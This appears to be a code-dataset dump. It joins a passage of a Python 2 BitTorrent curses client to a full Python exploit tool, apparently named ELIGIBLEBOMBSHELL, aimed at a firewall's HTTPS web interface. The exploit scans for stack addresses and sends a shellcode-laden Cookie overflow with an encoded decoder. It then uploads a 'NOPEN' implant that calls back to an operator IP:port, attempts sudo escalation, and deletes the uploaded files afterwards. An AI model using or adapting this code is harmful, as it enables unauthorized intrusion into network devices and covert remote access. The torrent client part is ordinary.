self.downRate = '---'
self.upRate = '---'
self.shareRating = ''
self.seedStatus = ''
self.peerStatus = ''
self.errors = []
self.file = ''
self.downloadTo = ''
self.fileSize = ''
self.numpieces = 0
self.spew_scroll_time = 0
self.spew_scroll_pos = 0
self._remake_window()
curses.use_default_colors()
def set_torrent_values(self, name, path, size, numpieces):
self.file = name
self.downloadTo = path
self.fileSize = fmtsize(size)
self.numpieces = numpieces
self._remake_window()
def winch_handler(self, signum, stackframe):
self.changeflag.set()
curses.endwin()
self.scrwin.refresh()
self.scrwin = curses.newwin(0, 0, 0, 0)
self._remake_window()
def _remake_window(self):
self.scrh, self.scrw = self.scrwin.getmaxyx()
self.scrpan = curses.panel.new_panel(self.scrwin)
self.labelh, self.labelw, self.labely, self.labelx = 11, 9, 1, 2
self.labelwin = curses.newwin(self.labelh, self.labelw,
self.labely, self.labelx)
self.labelpan = curses.panel.new_panel(self.labelwin)
self.fieldh, self.fieldw, self.fieldy, self.fieldx = (
self.labelh, self.scrw-2 - self.labelw-3,
1, self.labelw+3)
self.fieldwin = curses.newwin(self.fieldh, self.fieldw,
self.fieldy, self.fieldx)
self.fieldwin.nodelay(1)
self.fieldpan = curses.panel.new_panel(self.fieldwin)
self.spewh, self.speww, self.spewy, self.spewx = (
self.scrh - self.labelh - 2, self.scrw - 3, 1 + self.labelh, 2)
self.spewwin = curses.newwin(self.spewh, self.speww,
self.spewy, self.spewx)
self.spewpan = curses.panel.new_panel(self.spewwin)
try:
self.scrwin.border(ord('|'),ord('|'),ord('-'),ord('-'),ord(' '),ord(' '),ord(' '),ord(' '))
except:
pass
self.labelwin.addstr(0, 0, _("file:"))
self.labelwin.addstr(1, 0, _("size:"))
self.labelwin.addstr(2, 0, _("dest:"))
self.labelwin.addstr(3, 0, _("progress:"))
self.labelwin.addstr(4, 0, _("status:"))
self.labelwin.addstr(5, 0, _("dl speed:"))
self.labelwin.addstr(6, 0, _("ul speed:"))
self.labelwin.addstr(7, 0, _("sharing:"))
self.labelwin.addstr(8, 0, _("seeds:"))
self.labelwin.addstr(9, 0, _("peers:"))
curses.panel.update_panels()
curses.doupdate()
self.changeflag.clear()
def finished(self):
self.done = True
self.downRate = '---'
self.display({'activity':_("download succeeded"), 'fractionDone':1})
def error(self, errormsg):
newerrmsg = strftime('[%H:%M:%S] ') + errormsg
self.errors.append(newerrmsg.split('\n')[0])
self.errlist.append(newerrmsg)
self.display({})
def display(self, statistics):
fractionDone = statistics.get('fractionDone')
activity = statistics.get('activity')
timeEst = statistics.get('timeEst')
downRate = statistics.get('downRate')
upRate = statistics.get('upRate')
spew = statistics.get('spew')
inchar = self.fieldwin.getch()
if inchar == 12: # ^L
self._remake_window()
elif inchar in (ord('q'),ord('Q')):
self.doneflag.set()
elif inchar in (ord('r'),ord('R')):
self.reread_config()
elif inchar in (ord('u'),ord('U')):
curses.echo()
self.fieldwin.nodelay(0)
s = self.fieldwin.getstr(6,10)
curses.noecho()
self.fieldwin.nodelay(1)
r = None
try:
r = int(s)
except ValueError:
pass
if r is not None:
self.ulrate(r)
if timeEst is not None:
self.activity = fmttime(timeEst)
elif activity is not None:
self.activity = activity
if self.changeflag.isSet():
return
if fractionDone is not None:
blocknum = int(self.fieldw * fractionDone)
self.progress = blocknum * '#' + (self.fieldw - blocknum) * '_'
self.status = '%s (%.1f%%)' % (self.activity, fractionDone * 100)
if downRate is not None:
self.downRate = '%.1f KB/s' % (downRate / (1 << 10))
if upRate is not None:
self.upRate = '%.1f KB/s' % (upRate / (1 << 10))
downTotal = statistics.get('downTotal')
if downTotal is not None:
upTotal = statistics['upTotal']
if downTotal <= upTotal / 100:
self.shareRating = _("oo (%.1f MB up / %.1f MB down)") % (
upTotal / (1<<20), downTotal / (1<<20))
else:
self.shareRating = _("%.3f (%.1f MB up / %.1f MB down)") % (
upTotal / downTotal, upTotal / (1<<20), downTotal / (1<<20))
numCopies = statistics['numCopies']
nextCopies = ', '.join(["%d:%.1f%%" % (a,int(b*1000)/10) for a,b in
zip(xrange(numCopies+1, 1000), statistics['numCopyList'])])
if not self.done:
self.seedStatus = _("%d seen now, plus %d distributed copies"
"(%s)") % (statistics['numSeeds' ],
statistics['numCopies'],
nextCopies)
else:
self.seedStatus = _("%d distributed copies (next: %s)") % (
statistics['numCopies'], nextCopies)
self.peerStatus = _("%d seen now") % statistics['numPeers']
self.fieldwin.erase()
self.fieldwin.addnstr(0, 0, self.file, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(1, 0, self.fileSize, self.fieldw)
self.fieldwin.addnstr(2, 0, self.downloadTo, self.fieldw)
if self.progress:
self.fieldwin.addnstr(3, 0, self.progress, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(4, 0, self.status, self.fieldw)
self.fieldwin.addnstr(5, 0, self.downRate, self.fieldw)
self.fieldwin.addnstr(6, 0, self.upRate, self.fieldw)
self.fieldwin.addnstr(7, 0, self.shareRating, self.fieldw)
self.fieldwin.addnstr(8, 0, self.seedStatus, self.fieldw)
self.fieldwin.addnstr(9, 0, self.peerStatus, self.fieldw)
self.spewwin.erase()
if not spew:
errsize = self.spewh
if self.errors:
self.spewwin.addnstr(0, 0, _("error(s):"), self.speww, curses.A_BOLD)
errsize = len(self.errors)
displaysize = min(errsize, self.spewh)
displaytop = errsize - displaysize
for i in range(displaysize):
self.spewwin.addnstr(i, self.labelw, self.errors[displaytop + i],
self.speww-self.labelw-1, curses.A_BOLD)
else:
if self.errors:
self.spewwin.addnstr(0, 0, _("error:"), self.speww, curses.A_BOLD)
self.spewwin.addnstr(0, self.labelw, self.errors[-1],
self.speww-self.labelw-1, curses.A_BOLD)
self.spewwin.addnstr(2, 0, _(" # IP Upload Download Completed Speed"), self.speww, curses.A_BOLD)
if self.spew_scroll_time + SPEW_SCROLL_RATE < time():
self.spew_scroll_time = time()
if len(spew) > self.spewh-5 or self.spew_scroll_pos > 0:
self.spew_scroll_pos += 1
if self.spew_scroll_pos > len(spew):
self.spew_scroll_pos = 0
for i in range(len(spew)):
spew[i]['lineno'] = i+1
spew.append({'lineno': None})
spew = spew[self.spew_scroll_pos:] + spew[:self.spew_scroll_pos]
for i in range(min(self.spewh - 5, len(spew))):
if not spew[i]['lineno']:
continue
self.spewwin.addnstr(i+3, 0, '%3d' % spew[i]['lineno'], 3)
self.spewwin.addnstr(i+3, 4, spew[i]['ip'], 15)
ul = spew[i]['upload']
if ul[1] > 100:
self.spewwin.addnstr(i+3, 20, '%6.0f KB/s' % (
ul[1] / 1000), 11)
self.spewwin.addnstr(i+3, 32, '-----', 5)
if ul[2]:
self.spewwin.addnstr(i+3, 33, 'I', 1)
if ul[3]:
self.spewwin.addnstr(i+3, 35, 'C', 1)
dl = spew[i]['download']
if dl[1] > 100:
self.spewwin.addnstr(i+3, 38, '%6.0f KB/s' % (
dl[1] / 1000), 11)
self.spewwin.addnstr(i+3, 50, '-------', 7)
if dl[2]:
self.spewwin.addnstr(i+3, 51, 'I', 1)
if dl[3]:
self.spewwin.addnstr(i+3, 53, 'C', 1)
if dl[4]:
self.spewwin.addnstr(i+3, 55, 'S', 1)
self.spewwin.addnstr(i+3, 58, '%5.1f%%' % (int(spew[i]['completed']*1000)/10), 6)
if spew[i]['speed'] is not None:
self.spewwin.addnstr(i+3, 64, '%5.0f KB/s' % (spew[i]['speed']/1000), 10)
self.spewwin.addnstr(self.spewh-1, 0,
_("downloading %d pieces, have %d fragments, "
"%d of %d pieces completed") %
(statistics['storage_active'], statistics['storage_dirty'],
statistics['storage_numcomplete'], self.numpieces),
self.speww-1)
curses.panel.update_panels()
curses.doupdate()
class DL(Feedback):
def __init__(self, metainfo, config, errlist):
self.doneflag = threading.Event()
self.metainfo = metainfo
self.config = Preferences().initWithDict(config)
self.errlist = errlist
def run(self, scrwin):
def reread():
self.multitorrent.rawserver.external_add_task(self.reread_config,0)
def ulrate(value):
self.multitorrent.set_option('max_upload_rate', value)
self.torrent.set_option('max_upload_rate', value)
self.d = CursesDisplayer(scrwin, self.errlist, self.doneflag, reread, ulrate)
try:
self.multitorrent = Multitorrent(self.config, self.doneflag,
self.global_error)
# raises BTFailure if bad
metainfo = ConvertedMetainfo(bdecode(self.metainfo))
torrent_name = metainfo.name_fs
if config['save_as']:
if config['save_in']:
raise BTFailure(_("You cannot specify both --save_as and "
"--save_in"))
saveas = config['save_as']
elif config['save_in']:
saveas = os.path.join(config['save_in'], torrent_name)
else:
saveas = torrent_name
self.d.set_torrent_values(metainfo.name, os.path.abspath(saveas),
metainfo.total_bytes, len(metainfo.hashes))
self.torrent = self.multitorrent.start_torrent(metainfo,
Preferences(self.config), self, saveas)
except BTFailure, e:
errlist.append(str(e))
return
self.get_status()
self.multitorrent.rawserver.install_sigint_handler()
self.multitorrent.rawserver.listen_forever()
self.d.display({'activity':_("shutting down"), 'fractionDone':0})
self.torrent.shutdown()
def reread_config(self):
try:
newvalues = configfile.get_config(self.config, 'bittorrent-curses')
except Exception, e:
self.d.error(_("Error reading config: ") + str(e))
return
self.config.update(newvalues)
# The set_option call can potentially trigger something that kills
# the torrent (when writing this the only possibility is a change in
# max_files_open causing an IOError while closing files), and so
# the self.failed() callback can run during this loop.
for option, value in newvalues.iteritems():
self.multitorrent.set_option(option, value)
for option, value in newvalues.iteritems():
self.torrent.set_option(option, value)
def get_status(self):
self.multitorrent.rawserver.add_task(self.get_status,
self.config['display_interval'])
status = self.torrent.get_status(self.config['spew'])
self.d.display(status)
def global_error(self, level, text):
self.d.error(text)
def error(self, torrent, level, text):
self.d.error(text)
def failed(self, torrent, is_external):
self.doneflag.set()
def finished(self, torrent):
self.d.finished()
if __name__ == '__main__':
uiname = 'bittorrent-curses'
defaults = get_defaults(uiname)
metainfo = None
if len(sys.argv) <= 1:
printHelp(uiname, defaults)
sys.exit(1)
try:
config, args = configfile.parse_configuration_and_args(defaults,
uiname, sys.argv[1:], 0, 1)
torrentfile = None
if len(args):
torrentfile = args[0]
for opt in ('responsefile', 'url'):
if config[opt]:
print '"--%s"' % opt, _("deprecated, do not use")
torrentfile = config[opt]
if torrentfile is not None:
metainfo, errors = GetTorrent.get(torrentfile)
if errors:
raise BTFailure(_("Error reading .torrent file: ") + '\n'.join(errors))
else:
raise BTFailure(_("you must specify a .torrent file"))
except BTFailure, e:
print str(e)
sys.exit(1)
errlist = []
dl = DL(metainfo, config, errlist)
curses_wrapper(dl.run)
if errlist:
print _("These errors occurred during execution:")
for error in errlist:
print error
| 38.988914 | 145 | 0.556187 | 2,041 | 17,584 | 4.709456 | 0.210681 | 0.025177 | 0.035581 | 0.027674 | 0.171036 | 0.117457 | 0.085518 | 0.053891 | 0.025177 | 0 | 0 | 0.02373 | 0.319381 | 17,584 | 450 | 146 | 39.075556 | 0.779412 | 0.052491 | 0 | 0.140212 | 0 | 0 | 0.09476 | 0 | 0 | 0 | 0 | 0 | 0.002646 | 0 | null | null | 0.005291 | 0.058201 | null | null | 0.029101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4e869698fe814d3a243ff2da3c5d64b703b2798 | 24,526 | py | Python | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | #!/usr/bin/python
import shellcode
import optparse
import httplib
import logging
import random
import socket
import sys
import re
from struct import pack, unpack
from time import sleep
########################
# Global configuration #
########################
DEFAULT_ETAG_FILE = "ELBO.config"
VERSION = "%prog v1.0.0.0"
####################################################################
# Add support for python 2.3 and 2.4 #
####################################################################
# 2.3 introduced Set, so anything older won't work anyway
# 2.4 introduced the set builtin, so anything newer works fine
if sys.version_info[0] <= 2 and sys.version_info[1] <= 3:
import sets
set = sets.Set
# "any" was introduced in 2.5
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
def any(iterable):
for e in iterable:
if e:
return True
return False
#####################
# Support functions #
#####################
def read_etag_file(options):
"""Returns a nested dictionary of the form:
{ etag-string: { "stack" : stack-address,
"version": software-version },
... }"""
tags = dict()
noserver = None
have_errors = False
options.scanplan = []
# split etag into its components
(inode, size, timestamp) = [int(x, 16) for x in options.etag.split("-")]
logging.info("Parsed ETag: inode=%d, filesize=%d, timestamp=%#x" %
(inode, size, timestamp))
fh = file(options.etag_file)
for line in [x.strip() for x in fh.readlines()]:
line = re.sub("\s*#.*", "", line) # remove trailing comments
if len(line) == 0: continue # skip blank lines
m1 = re.match("ETAG\s*=\s*(.+)", line)
m2 = re.match("NOSERVER\s*=\s*(.+)", line)
m3 = re.match("SCANPLAN\s*=\s*(.+)", line)
if not (m1 or m2 or m3):
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
if m1: # an "ETAG = ..." line
fields = dict(zip(["etag", "action", "stack", "version"],
[x.strip() for x in m1.group(1).split(":")]))
if len(fields) == 3:
fields["version"] = "unknown"
elif len(fields) != 4:
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
# skip actions that don't match the --action command line argument
if options.action not in fields["action"]:
logging.debug("Skipping configuration [%s:%s] due to --action" %
(fields["etag"], fields["action"]))
continue
# convert hex numbers to actual numbers (not strings)
if fields["stack"].startswith("0x"):
fields["stack"] = long(fields["stack"], 16)
if fields["etag"] not in tags:
tags[fields["etag"]] = []
tags[fields["etag"]].append(dict(action=fields["action"],
stack=fields["stack"],
version=fields["version"]))
elif m2: # a "NOSERVER = ..." line
noserver = m2.group(1)
elif m3: # a "SCANPLAN = ..." line
fields = dict(zip(["action","low","high","addrs"],
[x.strip() for x in m3.group(1).split(":")]))
if options.action not in fields["action"]:
logging.debug("Skipping scanplan [%s:%s:%s] due to --action" %
(fields["action"], fields["low"], fields["high"]))
continue
fields["low"] = long(fields["low"], 16)
fields["high"] = long(fields["high"], 16)
addrs = [x.strip() for x in fields["addrs"].split(",")]
addrs = [x.startswith("0x") and long(x,16) or x for x in addrs]
# if the etag we want to hit is in this SCANPLAN, add it
if timestamp >= fields["low"] and timestamp <= fields["high"]:
scanplan = [dict(action=fields["action"], stack=x)
for x in addrs]
if options.maxfailsaction > 0:
options.scanplan += scanplan[:options.maxfailsaction]
else:
options.scanplan += scanplan
fh.close()
if have_errors:
sys.exit(1)
return (tags, noserver)
def get_details_for_etag(options):
"""Get the stack address for a specific ETag from the configuration file."""
(tags, noserver) = read_etag_file(options)
if noserver and not options.noserver:
options.noserver = noserver
# strip off wacky W/ and quotes (if they're there)
m = re.match('(?:W/)?"?(.*)"?$', options.etag)
if m:
options.etag = m.group(1)
etag = options.etag
# look for an exact match
if etag in tags:
print "Found etag [%s] for version %s" % (etag,tags[etag][0]['version'])
return tags[etag]
# didn't find exact match - strip off the inode part and check again
short = etag[etag.index("-"):]
for t in tags:
if t.find(short) != -1:
print "Partial ETag match: [%s],[%s] for version %s" % \
(etag, t, tags[t][0]['version'])
return tags[t]
return None
def encode(string):
"""Encode string argument (XOR with a mask byte) to remove any
forbidden characters."""
bad = ['\x00', '\t', ' ', '\r', '\n']
start = random.randint(1, 255)
maskb = (start + 1) & 0xff
while maskb != start:
if chr(maskb) in bad:
maskb = (maskb + 1) & 0xff
continue
# mask all arguments
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# see if we got rid of all bad characters
if not any([x in string for x in bad]):
return (maskb, string)
# unmask for next try
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# incr mask
maskb = (maskb + 1) & 0xff
raise Exception("Could not find valid mask byte.")
def build_payload(options, address, libc):
"""Build the exploit cookie + post data payload."""
if options.op == "scan":
body = shellcode.probe
elif options.op == "nopen":
body = shellcode.nopen
# fill in noserver file length and callback ip/port
body = body[:2] + \
pack("<I", len(shellcode.tiny_exec)) + \
pack("<I", len(options.nopen)) + \
pack("35s", "D=-c%s" % options.callback_ip) + \
body[45:]
elif options.op == "cleanup":
body = shellcode.cleanup
else:
raise Exception("ERROR: Invalid operation specified.")
if libc:
cookie = shellcode.auth_id
bodylen = len(body)
if bodylen > 0xffff:
raise Exception("body must be <= 0xffff bytes long")
# fill in bodylen in auth_id shellcode
if (bodylen & 0xff00) == 0:
cookie = cookie[:10] + "\x90\x90" + cookie[12:]
else:
cookie = cookie[:11] + chr((bodylen & 0xff00) >> 8) + cookie[12:]
if (bodylen & 0xff) == 0:
cookie = cookie[:12] + "\x90\x90" + cookie[14:]
else:
cookie = cookie[:13] + chr(bodylen & 0xff) + cookie[14:]
if len(cookie) > 60:
raise Exception("ERROR: Cookie shellcode must be <= 60 bytes!")
cookie = "auth_id=" + chr(0x90)*(60 - len(cookie)) + cookie
cookie += pack("<I", address)
else:
decoder = shellcode.decoder
execute = shellcode.execute_post
exec_len = pack("<I", len(execute))
deco_len = pack("<I", len(decoder))
body_len = pack("<I", len(body))
# replace 0xdeadbeef with actual body length
execute = execute[:7] + body_len + execute[11:]
(maskb, string) = encode(execute + exec_len + deco_len)
execute = string[:-8]
exec_len = string[-8:-4]
deco_len = string[-4:]
maskw = chr(maskb)*4
decoder = decoder[0] + deco_len + decoder[5] + maskw + \
decoder[10:15] + exec_len + decoder[19:21] + maskw + \
decoder[25:29] + chr(maskb) + decoder[30:]
cookie = shellcode.finder + decoder + execute
if len(cookie) > 1036:
raise Exception("ERROR: Cookie shellcode must be <= 1036 bytes!")
sled_len = (1036 - len(cookie)) # 1036 = buffer len to overflow
logging.info("Using decoder masking byte %#x" % maskb)
logging.info("Using %d-byte NOP sled" % sled_len)
cookie = chr(0x90)*sled_len + cookie + pack("<I", address)
if options.op == "nopen":
return (cookie, body + options.nopen + shellcode.tiny_exec)
else:
return (cookie, body)
def get_response(options, address):
"""Send an exploit to the target and get its response."""
# some addresses are fake, so we remap them here
remap_addr = { 'libc.0': 0x0804a625L, 'libc.1': 0x2aab757c }
method = "GET"
if address["stack"] in remap_addr:
real_addr = remap_addr[address["stack"]]
(cookie, body) = build_payload(options, real_addr, libc=True)
else:
(cookie, body) = build_payload(options, address["stack"], libc=False)
conn = httplib.HTTPSConnection(options.target_ip, options.port)
if logging.getLogger().level <= logging.DEBUG:
if len(body) + len(cookie) > 10240:
logging.debug("WARNING: debug mode selected, but the amount of " +
"data being sent to the server is large (> 10kb). " +
"Temporarily disabling debug output.")
else:
conn.set_debuglevel(3)
logging.info("Sending %s request (%d-byte cookie) to https://%s:%s%s" %
(method, len(cookie), options.target_ip, options.port,
address["action"]))
try:
conn.request(method, address["action"], body=body,
headers={"Cookie": cookie})
except socket.error, e:
print "Connection error %d: %s" % tuple(e)
sys.exit(1)
return conn.getresponse()
####################
# "Main" functions #
####################
def scan(options):
"""Scan for which vulnerability / stack address to use"""
addrs = get_details_for_etag(options)
if addrs is None:
addrs = options.scanplan
if options.maxfails > 0:
addrs = addrs[:options.maxfails]
else:
logging.info("--scan initiated against a known version: Only " +
"sending one scan (expect success!)")
logging.debug("scanplan = [" +
",".join(["(%s, %s)" % (x["action"],
type(x["stack"]) == long and \
("%#010x" % x["stack"]) or \
x["stack"])
for x in addrs]) +
"]")
if len(addrs) == 0:
print "ERROR: No valid SCANPLAN found for your ETag. If you supplied an --action argument, try again without it. Otherwise, contact a developer."
return
skip_404 = dict() # CGI's that aren't on the target
for (i,addr) in enumerate(addrs):
logging.info("------------------------------------------------")
if type(addr["stack"]) == str:
print "Atmpt. %d of %d: Trying return to %s against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
else:
print "Atmpt %d of %d: Trying stack addr %#010x against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
cgi_name = addr["action"][:addr["action"].find("?")]
if cgi_name in skip_404:
logging.info("... skipped due to HTTP %d" % skip_404[cgi_name])
continue
resp = get_response(options, addr)
logging.info(" received HTTP %s %s" % (resp.status, resp.reason))
if resp.status == 200:
address = addr
break
if resp.status >= 300 and resp.status < 500:
skip_404[cgi_name] = resp.status
logging.info("Skipping all future scans against %s due to HTTP status" % cgi_name)
sleep(options.delay)
if resp.status != 200:
if len(addrs) == 1 and options.maxfails != 1:
print "ERROR: Vulnerability parameter recorded in %s FAILED." % \
options.etag_file
print " Try deleting the entry and running --scan again."
else:
print "All scans failed. No vulnerability found."
return
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) < 16:
print "ERROR: Expected at least 16 bytes from exploit, but only " + \
"got %d" % len(data)
return
code_ack = 0xc0edbabeL
code_sudo = 0x900d50d0L
code_nosudo = 0xbad500d0L
code_root = 0xb00500d0L
code_exec = 0xbaade7ecL
(ack, stack, euid, sudo) = unpack("<IIII", data[:16])
if ack == code_ack:
data = data[16:]
print "Received ACK from exploit payload."
print "================================================="
print "Effective UID: %d" % euid
if sudo == code_sudo:
print "/tos/bin/sudo appears to be available."
print "Output of '/tos/bin/sudo /usr/bin/id':"
if unpack("<I", data[:4])[0] == code_exec:
print " ERROR: execve() failed!"
else:
print data
data = ""
elif sudo == code_nosudo:
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
print "/tos/bin/sudo is NOT available!"
print "May not be able to escalate privileges!"
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
elif sudo == code_root:
print "Already root, so skipping sudo check"
else:
print "Unknown sudo status: got %#x but expected %#x or %#x" % \
(sudo, code_sudo, code_nosudo)
if len(data):
print "Received unexpected data:", repr(data)
print "================================================="
if type(address["stack"]) == str:
print "Successful libc exploit."
config_line = " ETAG = %s : %s : %s" % \
(options.etag, address["action"], address["stack"])
else:
print "Successful probe stack address: %#010x" % address["stack"]
print "Exact stack address : %#010x" % stack
config_line = " ETAG = %s : %s : %#010x" % \
(options.etag, address["action"], stack)
if len(addrs) == 1:
print "Vulnerability for ETag [%s] confirmed!" % options.etag
else:
print "Add this line to %s:" % options.etag_file
print config_line
print "and then add the version column when known."
else:
print "ERROR! Received invalid ack word [%#x] vs [%#x]" % (ack,code_ack)
print "received (%d): %s" % (len(data), repr(data))
print "Exploit failed."
def nopen(options):
"""Upload noserver to the target and have it call back"""
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
if not options.noserver:
options.parser.error("--nopen also requires -n/--noserver or a " +
"NOSERVER entry in %s" % options.etag_file)
if not options.callback_ip:
options.parser.error("--nopen also requires -c/--callback!")
try:
fh = file(options.noserver)
options.nopen = fh.read()
fh.close()
except:
print "ERROR: Could not read noserver file [%s]" % (options.noserver)
return
codes = {
0xdeadbeefL: "Received ACK from exploit. Uploading NOPEN.",
0xc0edbabeL: "Uploaded NOPEN! Callback commencing.",
0x00000001L: "ERROR: Could not read POSTed NOPEN binary.",
0x00000002L: "ERROR: Could not write NOPEN binary to target disk.",
0x00000003L: "ERROR: Unexpected EOF while uploading NOPEN binary.",
0x00000004L: "ERROR: Could not open() upload filename on target.",
0x00000005L: "ERROR: exeve() on uploaded NOPEN binary failed.",
0x00000006L: "warning: Could not close() uploaded file on target. Continuing anyway. (Is there another NOPEN session already alive?)",
0x00000007L: "warning: sudo failed! Running NOPEN as nobody.",
}
resp = get_response(options, addr[0])
while True:
try:
data = resp.read(4)
except ValueError:
break
if len(data) == 0:
break
logging.debug("received data(%d): %s" % (len(data), repr(data)))
code = unpack("<I", data)[0]
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
data += resp.read()
print data
break
def cleanup(options):
"""Try to delete uploaded files from the target"""
# extract uploaded filenames from shellcode
null0 = shellcode.cleanup.index("\x00")
null1 = shellcode.cleanup.index("\x00", null0+1)
noserver_upload = shellcode.cleanup[2:null0]
tinyexec_upload = shellcode.cleanup[null0+1:null1]
codes = {
0x00000002L: "ERROR: unlink('%s') (%s) - cleanup NOT successful - file is still sitting on target!",
0x00000100L: "success: stat('%s') (%s) - file is sitting on target",
0x00000200L: "success: unlink('%s') (%s) - file removed from target",
}
masks = {
0x00010000L: (noserver_upload, 'noserver'),
0x00020000L: (tinyexec_upload, 'tiny-exec'),
}
orig_codes = codes.keys()
for m in masks:
for c in orig_codes:
codes[m ^ c] = codes[c] % masks[m]
for c in orig_codes:
del codes[c]
codes[0x00010001L] = "warning: stat() on '%s' (noserver) failed - file not uploaded? This may be normal if the exploit upload failed or the file was deleted manually." % noserver_upload
codes[0x00020001L] = "warning: stat() on '%s' (tiny-exec) failed - file not uploaded? This may be normal if the exploit upload failed, the file was deleted manually, or we did not need to upload tiny-exec (i.e., we were already running as EUID root)." % tinyexec_upload
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
resp = get_response(options, addr[0])
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) % 4 != 0:
print "ERROR: Expected 4-byte status codes but got %d bytes:"%len(data)
print repr(data)
return
from_exploit = unpack("<" + ("I" * (len(data)/4)), data)
for code in from_exploit:
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
def main():
"""Parse command line arguments"""
def handle_op_arg(option, opt_str, value, parser, opname):
if parser.values.op:
raise optparse.OptionValueError(
"Only one of --probe, --scan, --nopen, or --cleanup should " +
"be supplied")
parser.values.op = opname
parser = optparse.OptionParser(version=VERSION, usage="""%prog [options]
See -h for specific options (some of which are required).
Examples:
Scan to find (unknown versions) or confirm (known versions) vulnerability:
%prog -t 1.2.3.4 -e 012-345-6789 --scan -v
Once a valid entry is in ELBO.config, upload nopen:
%prog -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v
Delete uploaded files from the previous step:
%prog -t 1.2.3.4 -e 012-345-6789 --cleanup -v""")
parser.add_option("-t", "--target-ip", dest="target_ip", action="store",
type="string", help="Target's IP address")
parser.add_option("-e", "--etag", dest="etag", action="store",
type="string", help="Target's ETag string")
parser.add_option("--scan", dest="op", action="callback",
callback=handle_op_arg, callback_args=("scan",),
help="Scan for vulnerability parameters")
parser.add_option("--delay", dest="delay", action="store", type="int",
default=1, help="Delay in seconds between probes " +
"during --scan (default=1 second)")
parser.add_option("-f", "--max-fails", dest="maxfails", action="store",
type="int", default=0, help="Total maximum number of " +
"failed scan attempts before aborting (default=0, run " +
"all scans); see also --max-fails-action")
parser.add_option("--max-fails-action", dest="maxfailsaction",
action="store", type="int", default=0, help="Maximum " +
"number of failed scan attempts on a single target " +
"CGI action before moving on to the next (default=0, " +
"run all scans)")
parser.add_option("--nopen", dest="op", action="callback",
callback=handle_op_arg, callback_args=("nopen",),
help="Upload NOPEN to target (requires -n and -c)")
parser.add_option("-n", "--noserver", dest="noserver", action="store",
type="string", help="Path to static noserver binary " +
"(overrides NOSERVER setting in %s)" % DEFAULT_ETAG_FILE)
parser.add_option("-c", "--callback", dest="callback_ip", action="store",
type="string", help="Callback IP:Port for --nopen " +
"(e.g., 127.0.0.1:12345")
parser.add_option("--cleanup", dest="op", action="callback",
callback=handle_op_arg, callback_args=("cleanup",),
help="Try to delete uploaded files from target")
parser.add_option("-p", "--port", dest="port", action="store", type="int",
default=443, help="Destination port (default=443)")
parser.add_option("--config", dest="etag_file", action="store",
type="string", default=DEFAULT_ETAG_FILE,
help="ETag configuration file (default=%s)" %
DEFAULT_ETAG_FILE)
parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
help="Turn on verbose output")
parser.add_option("-d", "--debug", dest="debug", action="store_true",
help="Turn on debugging output")
parser.add_option("--action", dest="action", action="store", type="string",
default="", help="Only try actions from ELBO.config " +
"that contain ACTION as a substring")
(options, args) = parser.parse_args()
if len(args) != 0:
parser.error("invalid arguments")
# make sure we have a target IP and his ETag
if not options.target_ip:
parser.error("-t/--target-ip is required!")
if not options.etag:
parser.error("-e/--etag is required!")
# handle -v and -d via logging module
level = logging.ERROR
if options.verbose:
level = logging.INFO
if options.debug:
level = logging.DEBUG
logging.basicConfig()
logging.getLogger().setLevel(level)
logging.getLogger().handlers[0].setFormatter(logging.Formatter("%(msg)s"))
options.parser = parser
# dispatch to the correct operation
if not options.op:
parser.error("One of --scan, --nopen, or --cleanup must " +
"be supplied")
dispatch = dict()
for func in [scan, nopen, cleanup]:
dispatch[func.func_name] = func
dispatch[options.op](options)
return
if __name__ == '__main__':
main()
